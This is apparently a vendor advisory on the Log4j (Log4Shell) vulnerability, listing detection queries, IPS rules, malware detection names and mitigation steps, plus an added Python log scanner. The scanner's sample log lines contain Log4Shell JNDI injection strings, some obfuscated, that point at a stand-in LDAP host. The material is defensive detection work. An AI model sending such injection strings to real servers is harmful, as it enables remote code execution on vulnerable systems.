Please note, if you are already a Trend Micro Vision One customer, you do not need to complete the form. Simply log into your console and you will be provided instructions to complete the assessment of your exposure.
Trend Micro Vision One™
Trend Micro Vision One customers benefit from XDR detection capabilities of the underlying products such as Apex One. In addition, depending on their data collection time range, Trend Micro Vision One customers may be able to sweep for IOCs retrospectively to identify if there was potential activity in this range to help in investigation.
Vision One Threat Intelligence Sweeping
Indicators for exploits associated with this vulnerability are now included in the Threat Intelligence Sweeping function of Trend Micro Vision One. Customers who have this enabled will now have the presence of the IOCs related to these threats added to their daily telemetry scans.
The first sweep, “Vulnerable version of log4j….” is slightly different than the others in that instead of specific IOCs, it is looking for specific instances of log4j libraries on systems which can help a customer narrow down or give additional insights on potentially vulnerable systems.
The results of the intelligence scans will populate in the WorkBench section of Vision One (as well as the sweep history of each unfolded threat intelligence report).
Please note that customers may also manually initiate a scan at any time by clicking the 3 dots at the right of a rule and selecting the “Start Sweeping” option.
Vision One Search Queries for Deep Security Deep Packet Inspection
Customers who have Trend Micro Cloud One – Workload Security or Deep Security may utilize the following search query to identify hosts and then additional queries can be made with a narrowed timeframe on those hosts as additional information is learned about exploits.
eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1005177) AND ("${" AND ("lower:" OR "upper:" OR "sys:" OR "env:" OR "java:" OR "jndi:"))
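The search query above is a plain string match. As an added example (not Trend Micro's code), this Python scanner applies the same test to web access log lines and then goes further, URL-decoding each line and collapsing nested lower/upper lookups before checking for a JNDI lookup. The log lines, hosts and function names are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote

# Lookup prefixes taken from the search query above.
LOOKUP_PREFIXES = ("lower:", "upper:", "sys:", "env:", "java:", "jndi:")
# An innermost ${lower:x} or ${upper:x}, with no nested lookup left inside.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}")
# A JNDI lookup; scheme and host[:port] are captured when present.
JNDI = re.compile(r"\$\{jndi:(?:([a-z]+)://([^/}\s]+))?")

# Constructed sample access-log lines (documentation IPs, .invalid hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET /api/v1/items HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 88 "-" "${jndi:ldap://scanner.example.invalid:1389/a}"',
    '198.51.100.4 - - [12/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.5 - - [12/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 88 "-" "${${lower:j}${upper:n}di:ldap://scanner.example.invalid/c}"',
    '192.0.2.33 - - [12/Dec/2021:10:01:15 +0000] "POST /login HTTP/1.1" 302 0 "-" "app/1.0 ${java:version}"',
]


@dataclass
class Finding:
    line_no: int
    verdict: str                # "jndi", "obfuscated-jndi" or "lookup-only"
    scheme: Optional[str]
    endpoint: Optional[str]


def coarse_match(line: str) -> bool:
    """Plain string test equivalent to the query: "${" AND any prefix."""
    low = line.lower()
    return "${" in low and any(p in low for p in LOOKUP_PREFIXES)


def normalize(line: str, max_rounds: int = 10) -> str:
    """Undo URL encoding, lowercase, and collapse nested lower/upper lookups."""
    text = line
    for _ in range(3):                      # also covers double encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = text.lower()
    for _ in range(max_rounds):             # bounded: the input is untrusted
        collapsed = CASE_LOOKUP.sub(r"\1", text)
        if collapsed == text:
            break
        text = collapsed
    return text


def classify(line_no: int, line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious line, or None for a clean one."""
    raw_hit = JNDI.search(line.lower())
    if raw_hit:
        return Finding(line_no, "jndi", raw_hit.group(1), raw_hit.group(2))
    norm = normalize(line)
    hit = JNDI.search(norm)
    if hit:                                 # visible only after normalizing
        return Finding(line_no, "obfuscated-jndi", hit.group(1), hit.group(2))
    if coarse_match(norm):                  # a lookup, but no JNDI reference
        return Finding(line_no, "lookup-only", None, None)
    return None


def scan(lines: List[str]) -> List[Finding]:
    findings = []
    for line_no, line in enumerate(lines, 1):
        finding = classify(line_no, line)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The URL-encoded request on sample line 3 never contains the literal characters `${`, so the plain string match misses it; the scanner reports it as `obfuscated-jndi` after decoding.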
Trend Micro Cloud One™ – Conformity
Trend Micro Cloud One – Conformity gives customers central visibility and real-time monitoring of their cloud infrastructure by enabling administrators to auto-check against nearly 1000 cloud service configuration best practices across 90+ services and avoid cloud service misconfigurations.
The following rules are available to all Trend Micro Cloud One – Conformity customers that may help provide more insight to customers looking to isolate affected machines (more information can be found here for rule configuration):
Lambda-001 : identifies all Lambdas that are running Java which may be vulnerable.
Unrestricted Security Group Egress (EC2-033) : identifies security groups that may be associated with, for example, an EC2 that may be compromised and then has the ability to communicate externally.
Preventative Rules, Filters & Detection
A demo video of how Trend Micro Cloud One can help with this vulnerability can be found at: https://youtu.be/CorEsXv3Trc.
Trend Micro Cloud One – Workload Security and Deep Security IPS Rules
Rule 1008610 – Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request
Rule 1008610 is a SMART rule that can be manually assigned to assist in protection/detection against suspicious activity that may be associated with this threat. This is not a comprehensive replacement for the vendor’s patch.
Please also note that rule 1008610 is shipped in DETECT, and must be manually changed to PREVENT if the administrator wishes to apply this. Also, please be aware that due to the nature of this rule, there may be False Positives in certain environments, so environment-specific testing is recommended.
Rule 1011249 – Apache Log4j Denial of Service Vulnerability (protects against CVE-2021-45105)
Trend Micro Cloud One – Workload Security and Deep Security Log Inspection
Rule 4643: POSSIBLE HTTP BODY OGNL EXPRESSION EXPLOIT – HTTP (REQUEST) – Variant 2
Trend Micro Cloud One – Network Security and TippingPoint Recommended Actions
Filter 40627 : HTTP: JNDI Injection in HTTP Header or URI
This was released in Digital Vaccine #9621 and has replaced CSW C1000001 that was previously released.
Trend Micro recommends customers enable this filter in a block and notify posture for optimal coverage. Starting with Digital Vaccines released on 12/21/2021, it will be enabled by default. Since it may not be enabled in your environment, Trend Micro strongly recommends you confirm the filter is enabled in your policy.
What other controls can be used to disrupt the attack?
This attack is successful when the exploit is used to initiate a transfer of a malicious attack payload. In addition to the filter above, these techniques can help disrupt that chain:
Geolocation filtering can be used to reduce possible attack vectors. Geolocation filtering can block inbound and outbound connections to any specified country, which may limit the ability for attackers to exploit the environment. In cases where a business only operates in certain regions of the globe, proactively blocking other countries may be advisable.
For TippingPoint IPS, TPS, and vTPS products, Trend Micro also recommends enabling DNS and URL reputation as a proactive means of securing an environment from this vulnerability. Leveraging Trend Micro’s rapidly evolving threat intelligence, TippingPoint appliances can help disrupt the chain of attack destined to known malicious hosts.
Additionally, Reputation filtering can be leveraged to block Anonymous proxies that are commonly used in exploit attempts. Any inbound or outbound connections to/from an anonymous proxy or anonymizer service can be blocked by configuring a reputation filter with “Reputation DV Exploit Type” set to “Tor Exit” to a Block action.
For Cloud One – Network Security, Anonymous proxies are also an independent, configurable “region” that can be selected as part of Geolocation filtering. This will block any inbound or outbound connection to/from an anonymous proxy or anonymizer service, which can be commonly used as part of exploit attempts.
Domain filtering can also be used to limit the attack vectors and disrupt the attack chain used to exploit this vulnerability. In this case, any outbound connection over TCP is dropped unless the domain being accessed is on a permit list. If the attacker’s domain, e.g. http://attacker.com, is not on the permit list, then it would be blocked by default, regardless of IPS filter policy.
Trend Micro Malware Detection Patterns (VSAPI, Predictive Learning, Behavioral Monitoring and WRS) for Endpoint, Servers, Mail & Gateway (e.g. Apex One, Worry-Free Business Security Services, Worry-Free Business Security Standard/Advanced, Deep Security w/Anti-malware, etc.)
Web Reputation (WRS): Trend Micro has added over 1700 URLs (and growing) to its WRS database to block those that are linked to malicious reporting and communication vectors associated with observed exploits against this vulnerability.
Ransomware Detection – there have been observations about a major ransomware campaign (Khonsari) being utilized in attacks and Trend Micro detects components related to this as Ransom.MSIL.KHONSARI.YXBLN.
VSAPI (Pattern) Detections: the following detections have been released in the latest OPR for malicious code associated with exploits –
Trojan.Linux.MIRAI.SEMR
HS_MIRAI.SMF
HS_MIRAI.SME
Trojan.SH.CVE20207961.SM
Backdoor.Linux.MIRAI.SEMR
Trojan.SH.MIRAI.MKF
Coinminer.Linux.KINSING.D
Trojan.FRS.VSNTLB21
Trojan.SH.MALXMR.UWELI
Backdoor.SH.KIRABASH.YXBLL
Backdoor.Linux.MIRAI.SMMR1
Coinminer.SH.MALXMR.UWEKG
Coinminer.Linux.MALXMR.SMDSL64
Backdoor.Linux.GAFGYT.SMMR3
Coinminer.Win64.MALXMR.TIAOODGY
Rootkit.Linux.PROCHID.B
ELF_SETAG.SM
Backdoor.Linux.TSUNAMI.AMZ
Coinminer.PS1.MALXMR.PFAIQ
Trojan.SH.TSUNAMI.A
Trojan.PS1.METERPRETER.E
Coinminer.Linux.MALXRMR.PUWENN
Trend Micro Cloud One – Application Security
Trend Micro Cloud One – Application Security can monitor a running application and stop unexpected shell commands from executing. The product’s RCE configuration can be adjusted to help protect against certain exploits associated with this vulnerability using the following steps:
Log into Trend Micro Cloud One and navigate to Application Security.
Select “Group’s Policy” in the left-hand menu and find your application’s Group.
Enable “Remote Command Execution” if not already enabled.
Click the hamburger icon for “Configure Policy” and then click the “< INSERT RULE >” icon.
Input (?s).* in the “Enter a pattern to match” field and hit “Submit” and “Save Changes.”
Double-check that “Mitigate” is selected in your “Remote Command Execution” line item.
Trend Micro Cloud One – Open Source Security by Snyk
Trend Micro Cloud One – Open Source Security by Snyk can identify vulnerable versions of the log4j library across all organization source code repositories with very little integration effort. Once installed, it can also monitor progress on updating to non-vulnerable versions.
Trend Micro is continuing to actively research the potential exploits and behavior around this vulnerability, is actively looking for malicious code that may be associated with any exploit attempts against it, and will be adding additional detection and/or protection as they become available.
Impact on Trend Micro Products
Trend Micro is currently doing a product/service-wide assessment to see if any products or services may be affected by this vulnerability. Products will be added to the lists below as they are validated.
Products Confirmed Not Affected (Including SaaS Solutions that have been patched):
5G Mobile Network Security
Not Affected
ActiveUpdate
Not Affected
Apex Central (including as a Service)
Not Affected
Apex One (all versions including SaaS, Mac, and Edge Relay)